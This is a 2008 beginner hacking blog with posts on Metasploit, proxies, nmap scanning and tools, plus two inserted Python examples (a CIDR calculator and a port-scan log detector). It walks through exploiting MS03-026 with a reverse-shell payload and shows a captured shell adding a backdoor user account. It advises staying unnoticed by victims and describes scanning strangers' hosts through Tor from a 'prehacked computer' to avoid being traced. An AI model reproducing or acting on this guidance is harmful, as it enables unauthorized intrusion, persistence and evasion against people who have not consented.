Friday, May 16, 2008

Friday night fun

Well, here is what I'm doing this Friday night. All day I was playing around with network streaming video; I have been playing around with ffserver and VLC streaming. I got VLC working great except for slow upload speeds. ffserver hasn't been working so great; whenever I try to host a file this happens:
#ffmpeg -i /tmp/output.flv http://localhost:8090/output.flv
Seems stream 0 codec frame rate differs from container frame rate: 23.98 (65535/2733) -> 23.98 (10000000/417083)
Input #0, avi, from '/tmp/test.avi':
Duration: 00:21:49.8, start: 0.000000, bitrate: 1088 kb/s
Stream #0.0: Video: mpeg4, yuv420p, 640x480, 23.98 fps(r)
Stream #0.1: Audio: mp3, 48000 Hz, stereo, 128 kb/s
Output #0, flv, to 'http://localhost:8090/test.flv':
Stream #0.0: Video: flv, yuv420p, 640x480, q=2-31, 200 kb/s, 23.98 fps(c)
Stream #0.1: Audio: libmp3lame, 22050 Hz, stereo, 64 kb/s
Stream mapping:
Stream #0.0 -> #0.0
Stream #0.1 -> #0.1
Press [q] to stop encoding
Broken pipe

I played with it for several hours today but still haven't gotten it to work. I'll probably put a couple more hours in tomorrow to get it to work, but it's Friday night, it's hack time. (lol) So VLC uses the default port of 1234 and ffserver uses 8090. I've mapped about 2,000 ports so far and only found 3 comps listening on 1234, and only one of them is VLC, but it's encrypted so I have to go back to looking. To let you know how I NMap: I use a prehacked computer, run the tor network and run NMap. I'll get a guide up on how to install tor soon enough. It registers that I'm in Germany, and if you constantly check back, like every 10 min, it will say you are somewhere else. I'll post my results up this weekend. This should be a good reason for people not to use default ports; always use off ports for personal use.

Tuesday, May 13, 2008

MetaSploit

A good way to learn how to start hacking is setting up a practice box. I usually just set up a fresh install of XP with no updates. This makes life easy; it's like progressing: you start with an open box and try to hack it, patch it and try to hack it again, secure it and try to hack it again, etc., so you learn how to grow from the bottom up. Believe it, it is 2008 and there are still some people who do not run SP2, which will shield you from my following example. Metasploit is a great program for n00bs: you can see the Framework so you know how it works, and you can monitor your network or the hack box so you can see exactly what it is doing. For this example I'll be using the Metasploit web interface, which I never used a couple of years ago. So you launch the interface and browse over to http://127.0.0.1:55555. For this example I will be using the exploit Microsoft RPC DCOM MS03-026. Once you select it you will be prompted with payloads; I always choose win32_reverse, which will give you a command prompt on that computer. My advice would be not to use VNC, since it will lock the user out of their computer and they will notice something is up. I like to make my own user account so if I'm ever actually at the computer I have a username and password. So when you deliver the payload you will get this:
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the user's password, change the admin password, etc. Have fun with it.

Wednesday, May 7, 2008

Proxy

To start off you are going to want to use proxies. It is a good habit to get into in case you are just browsing the web and come across bad source code later on and want to exploit it. It's relatively simple. You can just google "anonymous proxy" and get a list of proxy servers. You might have to try around 10 of them to find one that is working and isn't uber slow. To set up a proxy in Firefox on Linux you go to
Edit
Options
Advanced
Connection-Settings
Manual proxy configuration
Then you would just fill it in according to the information you found on the proxy list. To test, you just browse to whatismyip.com, and if it says your IP is that of the proxy server then you are ready to go!

Tuesday, May 6, 2008

NMap

Nmap is a great tool. First you install nmap; I'm a FreeBSD guy, so to install all I do is:
#cd /usr/ports/security/nmap
#make install clean
Now that nmap is installed, there are many types of scans you can do. I choose to do SYN scans. A SYN scan is pretty much like playing ding dong ditch: you initiate a 3-way handshake, wait for the response and leave; you never send the third step of the handshake. To do a SYN scan you use the switch -sS. Another good switch you will want to add is -P0 (zero); this will make nmap run even if it doesn't get a response to the ping. This is good because a lot of firewalls block ICMP requests. The most important switch is the port switch -p"port#". You can either tell nmap to look at a port or a range of ports. I usually choose port 3389, the mstsc port; you will find out what OS it's running, XP, Vista, Server 2k or Server 03, just by logging on. So the command will look something like this to scan 3389 with all the switches I talked about:
#nmap -p3389 -P0 -sS
The next thing you have to include in the command is the IP address. You can either scan an IP or a range of IPs. I usually scan a range on Thursday night so that by the time it's Friday night I'll have something to do. To scan the IP 192.168.1.107 you would do this:
#nmap -p3389 -P0 -sS 192.168.2.107
To scan 192.168.2.0-255 you would use the /24. For all of you who don't know what the 24 is: it means 255.255.255.0, which equates to 24 1's, 11111111.11111111.11111111.00000000. So the command will look something like:
#nmap -p3389 -P0 -sS 192.168.2.0/24
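To make the /24 arithmetic above concrete, here is an added example (not from the original post) that expands a CIDR prefix the way the post describes it: the prefix length is the number of leading one-bits in the mask, and everything behind those bits is the range the scan covers. It generalises to any prefix length from /0 to /32, not just /24.

```python
# Added example: expand a CIDR block into its mask, the mask in dotted binary,
# and the first/last address covered. Pure integer arithmetic on 32-bit values.

def prefix_to_mask(prefix_len):
    """Netmask as a 32-bit int: prefix_len one-bits followed by zero-bits (24 -> 0xFFFFFF00)."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length must be 0..32")
    return (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF

def ip_to_int(dotted):
    """'192.168.2.0' -> 0xC0A80200, validating each octet."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: %r" % dotted)
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

def int_to_ip(value):
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def mask_to_binary(mask):
    """Dotted binary form, e.g. 11111111.11111111.11111111.00000000 for /24."""
    return ".".join(format((mask >> shift) & 0xFF, "08b") for shift in (24, 16, 8, 0))

def describe_cidr(cidr):
    """'192.168.2.0/24' -> mask, binary mask, first (network) and last (broadcast) address, count."""
    address, prefix = cidr.split("/")
    mask = prefix_to_mask(int(prefix))
    network = ip_to_int(address) & mask          # host bits cleared
    broadcast = network | (~mask & 0xFFFFFFFF)    # host bits set
    return {
        "mask": int_to_ip(mask),
        "mask_binary": mask_to_binary(mask),
        "first": int_to_ip(network),
        "last": int_to_ip(broadcast),
        "addresses": broadcast - network + 1,
    }

if __name__ == "__main__":
    for block in ("192.168.2.0/24", "10.1.2.3/8", "192.168.2.107/32"):
        print(block, describe_cidr(block))
```

Note that the network part is computed from the address, so 10.1.2.3/8 reports the whole 10.0.0.0 block rather than an address-specific range.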
The results of the scan will look something like this:
PORT STATE SERVICE
3389/tcp filtered ms-term-serv
If the program isn't listening on 3389 and you have a firewall, it will say filtered. If nothing is listening on the port and you don't have a firewall, it will say closed, and if something is listening on that port it will say open.

Programs

Let's get this straight: 90% of real hackers do not use pre-made programs. What a lot of hackers do is browse the web and look at source code for bad code or an opening. But I'm going to assume that most of you don't know HTML, PHP, etc. well enough to spot these flaws. There are plenty of great tools out there for beginners to use, such as:
Nmap
metasploit
tsgrinder
Security is a big thing for a hacker to practice; you don't want your scans coming back to you, like a company calling your ISP and saying this guy is port scanning me. So it is a good idea to always use a proxy or a proxy chain. It's pretty easy to find out who's port scanning you. I opened a log off my firewall and got the IP of someone who portscanned 5 of my ports, 216.77.188.54; then I just go to ARIN, plug in the IP and bam, I have an ISP, BellSouth, and a location in the country, Atlanta GA.
If you nmap a company with a static IP you probably will never get a call, unless they have an anal tech guy. It would take me about a week to go through a day of port scan logs, so it's not very worth it in my perspective. But do this without a proxy at your own risk. And make sure the proxy is anonymous and not transparent. LOL
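The firewall-log side of the story above, as an added example that is not part of the original post: a small detector that reads iptables-style LOG lines, groups TCP SYNs by source address, and flags any source that touches a threshold number of distinct destination ports within a time window. The log lines are constructed for the example and use documentation-range addresses, not real hosts; the rule prefix "FW-DROP" and the year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the style of an iptables LOG rule (documentation-range addresses).
SAMPLE_LOG = """\
May  7 22:10:01 fw kernel: FW-DROP IN=em0 SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51001 DPT=21 SYN
May  7 22:10:01 fw kernel: FW-DROP IN=em0 SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51002 DPT=22 SYN
May  7 22:10:02 fw kernel: FW-DROP IN=em0 SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51003 DPT=80 SYN
May  7 22:10:02 fw kernel: FW-DROP IN=em0 SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51004 DPT=1234 SYN
May  7 22:10:03 fw kernel: FW-DROP IN=em0 SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51005 DPT=3389 SYN
May  7 22:15:40 fw kernel: FW-DROP IN=em0 SRC=192.0.2.44 DST=198.51.100.20 PROTO=TCP SPT=40001 DPT=80 SYN
May  7 23:30:00 fw kernel: FW-DROP IN=em0 SRC=192.0.2.44 DST=198.51.100.20 PROTO=TCP SPT=40002 DPT=443 SYN
"""

# syslog timestamp, then the SRC= and DPT= fields of a TCP entry
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) .*?SRC=(?P<src>[\d.]+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)

def parse_line(line, year=2008):
    """Return (timestamp, source_ip, dest_port) for a TCP log line, or None if it does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("src"), int(m.group("dpt"))

def find_scanners(log_text, min_ports=5, window_seconds=60):
    """Return {source_ip: sorted distinct ports} for every source that probed at least
    min_ports different ports within any window_seconds-long span."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, src, dport = parsed
            events[src].append((ts, dport))
    scanners = {}
    for src, hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):      # slide the window over each start time
            ports = {p for t, p in hits[i:] if (t - start).total_seconds() <= window_seconds}
            if len(ports) >= min_ports:
                scanners[src] = sorted(ports)
                break
    return scanners

if __name__ == "__main__":
    for src, ports in find_scanners(SAMPLE_LOG).items():
        print("possible port scan from %s: ports %s" % (src, ports))
```

The 192.0.2.44 entries are two unrelated connection attempts over an hour apart, so they stay below the threshold unless the window is widened.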

Welcome

So I'm going to introduce some of you to the world of hacking. Over the next couple of months I'm going to teach you how to go from being a complete n00b to script kiddie to someone who knows their stuff. There are many different types of hackers; I'm not going to get into the hacker vs. cracker speech, because they are both good skills to have. I find hardware hacking more fun than software, probably because I'm good at hardware hacking, but I've been teaching myself computer hacking for a couple of years now and I'll show you what I have learned. Not all hacking is bad; it comes in very handy when you are a Network Administrator. Well, hope you guys enjoy.